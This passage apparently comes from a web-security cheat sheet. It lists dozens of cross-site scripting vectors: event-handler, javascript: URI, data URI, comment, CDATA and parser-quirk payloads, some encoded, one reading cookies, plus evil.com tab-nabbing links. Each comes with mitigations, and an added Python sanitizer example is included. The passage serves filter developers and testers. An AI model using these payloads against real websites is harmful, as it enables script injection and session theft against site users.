Vectors making use of HTML5 features
XSS via formaction - requiring user interaction (1) [#1]
A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form.
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
Don't allow users to submit markup containing "form" and "formaction" attributes or transform them to bogus attributes. Avoid "id" attributes for forms as well as submit buttons.
- Firefox 4.0
- Firefox Latest
- Opera 10.5
- Opera Latest
- Chrome 10.0
- Chrome Latest
- Safari 4.0.4
- Safari Latest
- Internet Explorer 10
- Internet Explorer Latest (Inside Form Element)
Self-executing focus event via autofocus [#7]
This vector uses an input element with autofocus to call its own focus event handler - no user interaction required.
<input onfocus=write(1) autofocus>
User submitted markup should not contain "autofocus" attributes.
- Firefox 4.0
- Firefox Latest
- Opera 9.0
- Opera Latest
- Safari 4.0
- Safari Latest
- Chrome 4.0
- Chrome Latest
- Internet Explorer 10.0
- Internet Explorer Latest
Self-executing blur event via autofocus competition [#8]
Here we have two HTML input elements competing for the focus - and one executing JavaScript on losing its focus.
<input onblur=write(1) autofocus><input autofocus>
User submitted markup should not contain "autofocus" attributes.
- Safari 4.0
- Safari Latest
- Chrome 4.0
- Chrome Latest
JavaScript execution via <VIDEO> poster attribute [#10]
Opera 10.5+ allows using poster attributes in combination with javascript: URIs. This bug has been fixed in Opera 11.
<video poster=javascript:alert(1)//></video>
Make sure only relative URIs, http URIs and correctly MIME-typed data URIs can be used for VIDEO poster attributes
- Opera 10.5
- Opera 11.01
Self-executing JavaScript via <BODY> onscroll autofocus [#12]
This vector triggers an onscroll event executing JavaScript on <BODY> due to an autofocus on an <INPUT> way further down the page.
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
- Firefox 4.0
- Firefox Latest
- Opera 9.0
- Opera Latest
- Safari 4.0
- Safari Latest
- Chrome 4.0
- Chrome Latest
Form surveillance with onformchange, onforminput and form attributes [#23]
Enter a value into the form element to see how "onforminput" and "onformchange" attributes can monitor <FORM> activity - even from outside the <FORM> via the form attribute on a <BUTTON> element.
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
Make sure users cannot submit markup including the "form", "onformchange" and "onforminput" attributes. Do not allow <FORM> elements with an "id" attribute.
- Opera 10.5
- Opera 12.0
JavaScript execution via <VIDEO> and <SOURCE> tag (1) [#55]
Opera 10.5+ and Chrome allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags.
<video><source onerror="alert(1)">
Make sure user submitted <SOURCE> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.
- Opera 10.5
- Opera Latest
- Chrome 4.0
- Chrome Latest
- Firefox 4.0
- Firefox Latest
JavaScript execution via <VIDEO> and <SOURCE> tag (2) [#56]
Firefox 3.5+ allows error handlers on <VIDEO> tags when combined with a <SOURCE> tag. The same works for <AUDIO> tags. On Firefox 4+ the <SOURCE> tag is not needed to trigger the error event: it fires because of the implicit "src" attribute on the <VIDEO> tag when the page URL contains a number sign (#).
<video onerror="alert(1)"><source></source></video>
Make sure user submitted <AUDIO> and <VIDEO> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.
- Firefox 3.5
- Firefox Latest
- Internet Explorer 9.0
- Internet Explorer Latest
XSS via formaction - requiring user interaction (2) [#72]
A vector displaying the HTML5 "formaction" capabilities for form hijacking. Note that this variation does not use the "id" and "form" attributes to connect button and form.
<form><button formaction="javascript:alert(1)">X</button>
Don't allow users to submit markup containing "form" and "formaction" attributes or transform them to bogus attributes.
- Firefox 4.0
- Firefox Latest
- Opera 10.5
- Opera Latest
- Chrome 10.0
- Chrome Latest
- Safari 4.0.4
- Safari Latest
- Internet Explorer 10.0
- Internet Explorer Latest
Passive JavaScript execution via <BODY> and oninput attribute [#86]
All browsers besides Internet Explorer 9 and below support the "oninput" event handler on form elements such as the given <INPUT>. The event fires on the form elements themselves, on the surrounding form, and on the <BODY> and <HTML> tags as well.
<body oninput=alert(1)><input autofocus>
Do not whitelist "oninput" attributes in user submitted markup.
- Firefox 3.6
- Firefox Latest
- Safari 4.0
- Safari Latest
- Chrome 4.0
- Chrome Latest
- Opera 9.0
- Opera Latest
- Internet Explorer 10.0
- Internet Explorer Latest
Passive JavaScript execution via MathML on Firefox [#130]
Modern Firefox versions allow the use of inline MathML. While other user agents don't support the href attribute for MathML elements (yet), Firefox does and thereby enables passive JavaScript execution. Note that supporting href for MathML elements is a feature - introduced with MathML 3. The same effect can be observed by using xlink:href. The statusline action further enables obfuscation of the actual link target - and in this example hides the JavaScript URI.
<math href="javascript:alert(1)">CLICKME</math>
<math>
<!-- up to FF 13 -->
<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>
<!-- FF 14+ -->
<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction>
</math>
Do not allow users to submit unfiltered MathML content.
- Firefox 6
- Firefox Latest
Transparent overwriting of request-data using HTML5 "dirname" attributes [#136]
Opera and Chrome support the HTML5 attribute "dirname", that can be used to have the browser communicate the text-flow direction of another input element by adding it to the server-sent request body. By injecting a "dirname" attribute in an existing form, an attacker can overwrite user input and thereby make it guessable for malicious purposes. The overwritten value would then be "ltr" or "rtl" - depending on the actual text-flow direction. The "dirname" attribute is not yet supported by Internet Explorer or Firefox.
<form action="" method="post">
<input name="username" value="admin" />
<input name="password" type="password" value="secret" />
<input name="injected" value="injected" dirname="password" />
<input type="submit">
</form>
Avoid white-listing the "dirname" attribute in user generated content. The effects on existing forms are hard to predict and might cause privacy problems and information leaks.
- Opera 12.0
- Chrome 22.0
- Chrome Latest
Executing JavaScript via cross-origin HTML imports [#138]
Google Chrome Canary already supports HTML Imports. They allow fetching resources from arbitrary origins (as long as the Access-Control-Allow-Origin headers are set properly) and injecting them into the requesting DOM. Currently, only Chrome supports the feature and it's still hidden behind a flag. It is, however, expected to be supported by all major browsers.
<link rel="import" href="test.svg" />
Make sure that HTML imports are limited to the same origin. Avoid permitting users to have <link> tags in user-generated rich-text as they can now directly execute JavaScript without any user interaction.
- Chrome 33.0
- Chrome Latest
- Opera Latest
Executing JavaScript via "srcdoc" attribute in Iframes [#139]
HTML5 specifies a "srcdoc" attribute for Iframes. This attribute, quite similar to data URIs, is capable of hosting HTML text to be rendered by the browser as the content of the Iframe. The pseudo-document created by the "srcdoc" attribute has full access to the hosting domain, although it runs in an artificial origin. This attribute should, if at all, only be used in combination with the Iframe Sandbox.
<iframe srcdoc="<img src=x:x onerror=alert(1)>" />
Make sure to use "srcdoc" only in combination with the Iframe Sandbox. Otherwise, XSS attacks might slip through existing filters' rules as the payload can be HTML encoded.
- Firefox 26.0
- Firefox Latest
- Chrome 20.0
- Chrome Latest
- Opera 15.0
- Opera Latest
HTML5 <picture> element and "srcset" attributes [#142]
HTML5 offers the <picture> element for responsive and accessible images. The <picture> element essentially wraps <source> and <img> elements and provides a way to offer alternative content. Novel here is that the "srcset" attribute allows triggering load events. This is likely to bypass existing WAF systems.
<picture><source srcset="x"><img onerror="alert(1)"></picture>
<picture><img srcset="x" onerror="alert(1)"></picture>
<img srcset=",,,,,x" onerror="alert(1)">
In case a black-list based XSS filter is in use, make sure that the combination of event handler and "srcset" attribute is detected by it as well.
- Chrome 38.0
- Chrome Latest
- Internet Explorer Spartan
Bypassing window.opener protection of rel="noreferrer" [#143]
In many situations, a developer might want to mitigate tab-nabbing attacks that use window.opener and its writable location object. To do so, it is recommended to apply a rel="noreferrer" attribute to external links. Depending on how the external links are embedded, the protection might however fail - and window.opener might not be null but still be exposed. The problem here is that rel attributes only work for <a> and <area>. Links and link-like navigation features can however be embedded in multiple other ways. Further note that MSIE pretty much ignores the standard and doesn't destroy window.opener without further effort.
<a href="//evil.com" target="_blank" rel="noreferrer">CLICK</a> // window.opener will be null
<map><area href="//evil.com" target="_blank" rel="noreferrer">CLICK</area></map> // window.opener will be null
<svg><a xlink:href="//evil.com" rel="noreferrer">CLICK</a></svg> // window.opener still works
<form action="//evil.com" target="_blank" rel="noreferrer"><input type="submit"></form> // window.opener still works
<form id="test" rel="noreferrer"></form><button form="test" formtarget="_blank" formaction="//evil.com">CLICKME</button> // window.opener still works
<math href="//evil.com" xlink:show="new" rel="noreferrer">CLICKME</math> // window.opener still works
Do not rely on the noreferrer attribute value alone, but rather use a dedicated de-referrer page that in addition deactivates window.opener using window.opener.__proto__=null.
- Chrome 4.0
- Chrome Latest
- Opera 9.0
- Opera Latest
- Internet Explorer 6.0
- Internet Explorer Latest
- Firefox 1.X
- Firefox Latest
- Safari 4.0
- Safari Latest
Generating greater-than with HTML5 Named Character References [#144]
Some of the HTML5 Named Character references generate two ASCII characters, such as <⃒ and >⃒. This can in some exotic scenarios be abused to generate valid HTML without actually closing a tag with an ASCII greater-than. The entity will produce the greater-than so we do not have to.
<iframe srcdoc="<svg onload=alert(1)>⃒"></iframe> <a href="javascript:'<svg onload=alert(1)>⃒'">CLICK</a>
Be very careful when HTML attributes are used to carry HTML data that is later being used on the website. When entities are accepted, some HTML entities can produce dangerous characters even if they don't look like it on first sight.
- Chrome 4.0
- Chrome Latest
- Opera 12.0
- Opera Latest
- Internet Explorer 9.0
- Internet Explorer Latest
- Firefox 4.X
- Firefox Latest
- Safari 4.0
- Safari Latest
XSS without User Interaction from passive Elements [#145]
Often, an attacker can only inject into a "passive" element, meaning for instance a DIV or a SPAN. For those elements, it's not always trivial to execute injected JavaScript without user interaction (such as clicks or mouse events). If the element injected into is outside the visible range, it becomes hard to prove that the injection is in fact exploitable. For this reason, this item lists all currently known ways of executing JavaScript without user interaction from passive elements. The list is expected to grow over time. Note that for some of the attacks here, the string "#xss" needs to be appended to the URL of the injected page.
# Chrome, Opera, Safari and Edge
<div onfocus="alert(1)" contenteditable tabindex="0" id="xss"></div>
<div style="-webkit-user-modify:read-write" onfocus="alert(1)" id="xss">
<div style="-webkit-user-modify:read-write-plaintext-only" onfocus="alert(1)" id="xss">
# Firefox
<div onbeforescriptexecute="alert(1)"></div>
<script>1</script>
# MSIE10/11 & Edge
<div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll="alert(1)">
# MSIE10
<div contenteditable onresize="alert(1)"></div>
# MSIE11
<div onactivate="alert(1)" id="xss" style="overflow:scroll"></div>
<div onfocus="alert(1)" id="xss" style="display:table">
<div id="xss" style="-ms-block-progression:bt" onfocus="alert(1)">
<div id="xss" style="-ms-layout-flow:vertical-ideographic" onfocus="alert(1)">
<div id="xss" style="float:left" onfocus="alert(1)">
# Chrome, Opera, Safari
<style>@keyframes x{}</style>
<div style="animation-name:x" onanimationstart="alert(1)"></div>
# Chrome, Opera, Safari
<style>
div {width: 100px;}
div:target {width: 200px;}
</style>
<div id="xss" onwebkittransitionend="alert(1)" style="-webkit-transition: width .1s;"></div>
# Safari
<div style="overflow:-webkit-marquee" onscroll="alert(1)"></div>
Most modern browsers provide ways to execute JavaScript from passive elements by combining several aspects an attacker can control. Seemingly passive XSS should thus be treated with similar severity to active XSS.
- Chrome 4.0
- Chrome Latest
- Opera 12.0
- Opera Latest
- Internet Explorer 9.0
- Internet Explorer Latest
- Firefox 4.X
- Firefox Latest
- Safari 4.0
- Safari Latest
JavaScript execution via <DETAILS> and ontoggle [#147]
The <DETAILS> element fires an "ontoggle" event without user interaction on modern Blink-based browsers. This can be abused to bypass blacklists as the event-tag combination is not very well known.
<details open ontoggle="alert(1)">
Be sure to work with whitelists when allowing users to submit markup - else experimental tags like <DETAILS> might be forgotten when filtering and escaping.
- Chrome 24.0
- Chrome Latest
- Opera 16.0
- Opera Latest
JavaScript execution via <VIDEO> with empty source and rate change events [#148]
The <VIDEO> element fires an "onratechange" event without user interaction on Firefox, even if no actual value for the "src" attribute is given. This can be used to bypass WAF and IDS systems as this combination of tag and attributes is rather uncommon and unknown.
<video src onratechange="alert(1)">
Be sure to work with whitelists when allowing users to submit markup - else tags like <VIDEO> might be forgotten when filtering and escaping.
- Firefox 15.0
- Firefox Latest
Vectors working on HTML4 and older versions
JavaScript execution via <FRAMESET> and onload [#31]
This classic vector shows that several tags don't need a "src" attribute to fire onload events, such as <IFRAME>, <BODY> and <FRAMESET>.
<frameset onload=alert(1)>
Be sure to work with whitelists when allowing users to submit markup - else ancient tags like <FRAMESET> might be forgotten when filtering and escaping.
- Internet Explorer 5.0
- Internet Explorer Latest
- Opera 8.X
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 3.0
- Safari Latest
JavaScript execution via <TABLE> and background [#32]
Opera 8-10.5+ as well as Internet Explorer 6 support JavaScript URIs for <TABLE> and some other tags' "background" attributes. This causes JavaScript execution without user interaction. The problem has been fixed in Opera 11.
<table background="javascript:alert(1)"></table>
In case evil attributes like event handlers are being filtered from user submitted markup make sure not to forget "background" - among others.
- Internet Explorer 6.0
- Opera 8.X
- Opera 11.01
HTML comment parsing issues (1) [#37]
This vector shows how comments are being parsed and what problems can arise in case user submitted HTML is allowed to contain comments.
<!--<img src="--><img src=x onerror=alert(1)//">
Make sure comments are not allowed in user submitted html. The markup should be checked for security issues after comments have been stripped out - not before.
- Internet Explorer 5.0
- Internet Explorer Latest
- Opera 8.0
- Opera Latest
- Firefox 1.0
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 3.0
- Safari Latest
HTML comment parsing issues (2) [#38]
Besides <!-- -->, Internet Explorer allows the use of <COMMENT> tags. The vector shows how comments are being parsed and what problems can arise in case user submitted HTML is allowed to contain comments. This example works up to IE 8 standards mode.
<comment><img src="</comment><img src=x onerror=alert(1)//">
Make sure <COMMENT> tags are not allowed in user submitted html. The markup should be checked for security issues after <COMMENT> tags have been stripped out or escaped - not before.
- Internet Explorer 5.0
- Internet Explorer Latest (In Older Docmode)
CDATA section parsing issues [#39]
Firefox and Opera allow using CDATA section delimiters in HTML - in the stripped form "<![" as well as with padding like "<![CDATA[". This can cause problems for filter mechanisms since those delimiters can be used for massive obfuscation. Firefox 4 and Opera 11.60 have fixed the issue. However, modern browsers have a separate XML parser for inline SVG or MathML, which allows the use of CDATA sections (including a slightly irregular shape).
<!-- up to Opera 11.52, FF 3.6.28 -->
<![><img src="]><img src=x onerror=alert(1)//">
<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->
<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
Make sure CDATA delimiters are not allowed in user submitted html. The markup should be checked for security issues after CDATA sections and delimiters have been stripped out or escaped - not before.
- Opera 8.0
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Internet Explorer 9.0
- Internet Explorer Latest
- Chrome 7.0
- Chrome Latest
- Safari 4.0.4
- Safari Latest
Plaintext tags used for markup obfuscation [#40]
This vector works on all tested user agents and shows how several filtering solutions can be tricked into accepting malicious HTML. A badly written filter will assume the error handler is part of the first image's "src" attribute and accept the incoming data.
<style><img src="</style><img src=x onerror=alert(1)//">
Don't rely on weak regular expressions for markup filtering. Use whitelists for allowed tags and rely on a filter solution based on a heavily tested tokenizer/parser.
- Internet Explorer 5.0
- Internet Explorer Latest
- Opera 8.X
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 3.0
- Safari Latest
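The allowlist-and-reserialize approach the mitigation above recommends, as an added example (this is not code from html5sec.org): Python's standard-library html.parser is used as the tokenizer, every tag and attribute not on a short allowlist is dropped, URL attributes are checked against an allowed-scheme list after whitespace and control characters are removed, and the output is rebuilt from scratch rather than patched with regular expressions. The same handling covers the HTML5 entries above (form/formaction, autofocus, srcdoc, dirname, event handlers all fall out because they are simply not listed) and the comment entries (#37, #38), since comments, declarations and processing instructions are discarded before anything is checked. The allowlist contents and the `effective_scheme` name are assumptions for the example.

```python
"""Allowlist HTML sanitizer on top of the stdlib tokenizer (added example)."""
import html
import re
from html.parser import HTMLParser

# Assumed allowlist for the example: tag -> attributes that survive on it.
# Everything absent (form, button, input, iframe, video, details, style,
# script, event handlers, autofocus, formaction, srcdoc, dirname, ...) is dropped.
ALLOWED_TAGS = {
    "p": set(), "b": set(), "i": set(), "em": set(), "strong": set(),
    "ul": set(), "ol": set(), "li": set(), "br": set(),
    "a": {"href", "title"},
    "img": {"src", "alt", "title"},
}
VOID_TAGS = {"br", "img"}
URL_ATTRS = {"href", "src"}
ALLOWED_SCHEMES = {"", "http", "https"}  # "" means a relative URL


def effective_scheme(url):
    """Scheme a lenient browser would act on, lower-cased ('' for relative URLs).

    Browsers ignore whitespace and ASCII control characters inside the scheme,
    so they are removed before matching: 'jav\\tascript:' resolves to 'javascript'.
    """
    cleaned = "".join(ch for ch in url if ord(ch) > 32 and not ch.isspace())
    match = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", cleaned)
    return match.group(1).lower() if match else ""


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)  # entities decoded before checks
        self.out = []
        self.stack = []    # open allowed tags, closed in order at the end
        self.dropped = []  # (tag, attribute, reason) for logging or alerting

    def _emit_start(self, tag, attrs):
        allowed = ALLOWED_TAGS.get(tag)
        if allowed is None:
            self.dropped.append((tag, None, "tag not allowlisted"))
            return False
        parts = []
        for name, value in attrs:
            value = value or ""
            if name not in allowed:
                self.dropped.append((tag, name, "attribute not allowlisted"))
            elif name in URL_ATTRS and effective_scheme(value) not in ALLOWED_SCHEMES:
                self.dropped.append((tag, name, "disallowed URL scheme"))
            else:
                # Re-serialize quoted and escaped: no original bytes pass through.
                parts.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(parts)}>")
        if tag not in VOID_TAGS:
            self.stack.append(tag)
        return True

    def handle_starttag(self, tag, attrs):
        self._emit_start(tag, attrs)

    def handle_startendtag(self, tag, attrs):
        if self._emit_start(tag, attrs) and tag not in VOID_TAGS:
            self.stack.pop()
            self.out.append(f"</{tag}>")

    def handle_endtag(self, tag):
        if tag in self.stack:  # close any tags left open inside it first
            while True:
                open_tag = self.stack.pop()
                self.out.append(f"</{open_tag}>")
                if open_tag == tag:
                    break

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

    # Comments, <!...> declarations, <![CDATA[...]]> and <?...?> are discarded,
    # so the markup is checked after they are gone rather than before.
    def handle_comment(self, data): pass
    def handle_decl(self, decl): pass
    def unknown_decl(self, data): pass
    def handle_pi(self, data): pass

    def result(self):
        self.close()
        while self.stack:
            self.out.append(f"</{self.stack.pop()}>")
        return "".join(self.out)


def sanitize(markup):
    """Return (clean_html, dropped) for untrusted markup."""
    parser = AllowlistSanitizer()
    parser.feed(markup)
    return parser.result(), parser.dropped


if __name__ == "__main__":
    # Constructed inputs shaped like the vectors on this page plus one benign sample.
    for sample in (
        '<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>',
        '<!--<img src="--><img src=x onerror=alert(1)//">',
        '<style><img src="</style><img src=x onerror=alert(1)//">',
        '<a href="jav&#x09;ascript:alert(1)">CLICK</a>',
        '<p>Hello <a href="https://example.com/?a=1&amp;b=2">link</a></p>',
    ):
        clean, dropped = sanitize(sample)
        print(f"{sample!r}\n  -> {clean!r}\n  dropped: {dropped}")
```

The `dropped` list is worth keeping: a sudden rise in "disallowed URL scheme" or "attribute not allowlisted" entries for a user is a useful detection signal on its own, independent of whether the payload would have worked in any browser.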
Error handler via empty list-style and load handler via empty content [#41]
Opera 10.5+ and earlier versions fire an error event for <LI> tags in case the background URL given via the style attribute cannot be loaded. The same works with "list-style-image" too. On Opera 10.10 and earlier, more tag/style combinations like background:url() and background-image:url() work as well. A combination like content:url(svg) also works, but at the moment it is sensitive to events and <script> tags before and after.
<li style=list-style:url() onerror=alert(1)></li>
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
- Opera 8.0
- Opera 12.0
Link hijacking via <BASE> and JavaScript URI [#42]
<BASE> link hijacking with JavaScript URIs works on Internet Explorer, Opera (O8-10.5 in case the link URL starts with #) and Safari. User interaction is required to execute the JavaScript. The vector sometimes has to be changed slightly to work for all mentioned user agents. Opera 11 ships a more or less working fix, but the problem continues to exist in forms that are difficult to exploit.
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
User submitted HTML should not allow usage of <BASE> tags. In case they are necessary no non-HTTP/non-relative URL schemes should be allowed.
- Opera 8.X
- Opera 10.63
- Safari 3.0
- Safari 5.1.7
- Internet Explorer 5.5
- Internet Explorer 8.0
JavaScript execution via <SCRIPT> for and event attributes [#48]
Internet Explorer allows using <SCRIPT> tags with "for" and "event" attributes to bind event data to specific HTML elements. The two shown attribute values cause script execution without user interaction. Opera simply ignores these attributes.
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
- Opera 10.0
- Opera 12.0
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
JavaScript execution via <OBJECT> DataURL attribute [#49]
Internet Explorer 9 and - in some situations - earlier versions support the use of JavaScript URIs for the "dataurl" attribute of a TDC Object. The JavaScript will be executed without any user interaction.
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
- Internet Explorer 6.0
- Internet Explorer 9.0
JavaScript execution via <OBJECT> data [#50]
Almost all browsers supporting data URIs allow executing JavaScript via crafted <OBJECT> "data" attribute value - even if base64 encoded. Note however, that different browsers execute the JavaScript on different origins. Firefox for instance will execute on the hosting domain and thus allow XSS, while Chrome will execute on about:blank.
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
Make sure user submitted HTML cannot contain <OBJECT> tags or only whitelisted <OBJECT> "data" values.
- Opera 8.X
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 4.0
- Safari Latest
JavaScript execution via <EMBED> src [#51]
Almost all browsers supporting data URIs allow executing JavaScript via a crafted <EMBED> "src" attribute value - even if base64 encoded. Only Firefox attempts to search for a plugin handler and fails.
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
<embed src="javascript:alert(1)"></embed> // Firefox only
Make sure user submitted HTML cannot contain <EMBED> tags or only whitelisted <EMBED> "src" values.
- Opera 8.X
- Opera Latest
- Chrome 3.0
- Chrome Latest
- Safari 4.0
- Safari Latest
- Firefox 12.0
- Firefox Latest
Tags nested in other tags to trick filters [#57]
Chrome, Firefox and Safari will execute JavaScript with this example nesting - while Opera and IE wouldn't.
<b <script>alert(1)//</script>0</script></b>
This vector is ideal to trick regular expression based HTML filters and sanitizers. Make sure your filters are aware of the fact that some user agents evaluate <b <script> while others will prefer <b><script>.
- Firefox 3.5
- Firefox 3.6.28
- Chrome 4.0
- Chrome 5.0
- Safari 3.0
- Safari 4.0.3
XSS using accent grave when copying innerHTML (1) [#59]
Internet Explorer treats the accent grave (`) as an attribute delimiter like " and '. The quotation mark (") will be stripped from the attribute value when using the innerHTML property in case it doesn't contain a space.
<div id="div1"><input value="``onmouseover=alert(1)"></div>
<div id="div2"></div>
<script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
Make sure the HTML filter you use is aware of the fact that the accent grave is a valid attribute delimiter for IE too - especially if users are allowed to post harmless JavaScript (JSReg, Google Caja). Be very careful when handling user generated HTML in the DOM later on. The innerHTML property does not always contain what it's supposed to.
- Internet Explorer 6.0
- Internet Explorer 8.0 (Unpatched)
Simulating attributes in IE [#62]
This vector simulates an attribute in IE by using a single quote to trick filters. This works up to IE9 in standards mode and in latest IE using older document modes.
<!-- IE 6-8 -->
<x '="foo"><x foo='><img src=x onerror=alert(1)//'>
<!-- IE 6-9 -->
<! '="foo"><x foo='><img src=x onerror=alert(2)//'>
<? '="foo"><x foo='><img src=x onerror=alert(3)//'>
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
JavaScript execution via src attribute [#63]
Most browsers allow executing JavaScript via <IFRAME> "src" attributes - this is expected behavior. Interestingly, this can be extended to other tags too. Opera 10, Chrome and Firefox execute JavaScript via the <EMBED> tag, while Opera 10 and Opera Mobile - as well as early Internet Explorer versions - even execute JavaScript from <SCRIPT>, <IMG> and <IMAGE> tags with a matching "src" attribute.
<embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF
<img src="javascript:alert(2)">
<image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓
<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓
Make sure "src" attributes can never contain non-HTTP-URLs to prevent XSS or worse.
- Firefox 3.0
- Firefox Latest
- Chrome 4.0
- Chrome 6.0
- Opera 8.X
- Opera 11.01
- Internet Explorer 6.0
JavaScript execution via IE filters and onfilterchange [#70]
In some situations it's possible to trigger a filterchange event by using just one filter, as the example shows. Also, the short filter notation is being used, which is supported by all IE versions despite the information in the documentation. In compatibility mode on IE8+ you can use the property "-ms-filter".
<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
- Internet Explorer 6.0
- Internet Explorer 9.0
<OBJECT> tag and Flash files executing JavaScript [#79]
<OBJECT> tags can directly include Flash files via the "data" attribute - allowing execution of JavaScript and more without user interaction.
<object allowscriptaccess="always" data="test.swf"></object>
Make sure users cannot control the "src" and "data" attribute values of <OBJECT> tags - or better don't whitelist <OBJECT> tags in user submitted markup at all.
class XSS {
    public static function main() {
        flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url || "javascript:alert(1)"), flash.Lib._root.name || "_top");
    }
}
crossdomain: 1
path: http://html5sec.org/test.swf
name: test.swf
- Safari 3.0
- Safari Latest
- Firefox 1.5
- Firefox Latest
- Opera 10.0
- Opera 12.0
- Internet Explorer 6.0
- Internet Explorer Latest
Special tags parsing issues [#91]
HTML tag names start with a-zA-Z (ignoring the null byte quirk in IE). In addition, there are other structures that are parsed as a tag (special tags). They begin with the following characters: !, ?, /, %. This has its reasons: DTDs, comments, XML declarations, import instructions in Internet Explorer, closing tags etc. start with these characters. These examples show that such tags inherit some properties of their standard models.
[A] Firefox, Opera, Google Chrome, Safari (4.0.4↑), IE 10↑ Standards mode: parameters of the special tags cannot contain a closing angle bracket ">".
[B] Safari (up to 4.0.3): parameters of the special tags can only be broken via "?>".
[C] Opera (up to 11.52): a special tag inherits the properties of a DTD: inside it you can create a section that starts with "[" and ends with "]".
[D] IE 9↓ Standards mode, Safari (up to 4.0.3): a sequence like "<% ... %>" is an alternative to comments.
These features can be used for obfuscation and bypassing filters. And remember, structures like "<È foo=...>" are not parsed as a tag in HTML.
[A] <? foo="><script>alert(1)</script>">
    <! foo="><script>alert(1)</script>">
    </ foo="><script>alert(1)</script>">
[B] <? foo="><x foo='?><script>alert(1)</script>'>">
[C] <! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">
[D] <% foo><x foo="%><script>alert(1)</script>">
- Internet Explorer 5.0
- Internet Explorer Latest
- Opera 8.X
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 3.0
- Safari Latest
JavaScript execution via MHTML-scheme [#96]
This example uses the ability to convert a file with any content type into a web archive using the mhtml URI scheme to run JavaScript. This feature was first discovered by Stepanishchev E. in 2006 and became known among web developers as an alternative to data URIs for IE6-7. In 2007, Hasegawa Y. independently proposed a way to use this mhtml feature for XSS. The fix that followed was incomplete because it did not take into account the possibility of addressing the contents of the archive using "!value". This possibility, as well as the possibility of accessing the host domain from the archive contents, are used in the example below. Using this vector, all sites that did not contain two consecutive new lines in their source code and allowed users to insert a new line were vulnerable - as well as all sites that allowed users to upload images without post-upload conversion etc. A link to such a web archive could be specified via <IFRAME>, location.href and comparable means. This example was published in June 2010; the fix was released in April 2011. The mhtml URI scheme no longer determines the content type, but archive contents still have access to the host domain.
<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
<html>
<body>
<b>some content without two new line \n\n</b>
Content-Type: multipart/related; boundary="******"<b>some content without two new line</b>
--******
Content-Location: xss.html
Content-Transfer-Encoding: base64
PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1
cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9
dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy
YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg
--******--
</body>
</html>
crossdomain: 1
path: http://html5sec.org/test.html
name: test.html
- Internet Explorer 5.0
- Internet Explorer 10.0
XSS using "xmlns" attribute in custom tag when copying innerHTML (2) [#97]
Internet Explorer incorrectly analyzes the attribute "xmlns" in custom tags when copying innerHTML - its value is being added to the tag <?XML:NAMESPACE> without any delimiters.
<!-- IE 5-9 -->
<div id=d><x xmlns="><iframe onload=alert(1)"></div>
<script>d.innerHTML+='';</script>
<!-- IE 10 in IE5-9 Standards mode -->
<div id=d><x xmlns='"><iframe onload=alert(2)//'></div>
<script>d.innerHTML+='';</script>
Be very careful when handling user generated HTML in the DOM later on. The innerHTML property does not always contain what it's supposed to.
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
HTML separators and ignored characters [#100]
[a] Characters accepted as tag name/attribute separators.
    Firefox, Internet Explorer, Safari, Google Chrome, Opera: 9,10,12,13,32,47
    Internet Explorer (5-9 SM): 11
[b] Characters ignored before attributes (and not accepted as parameter/attribute separators).
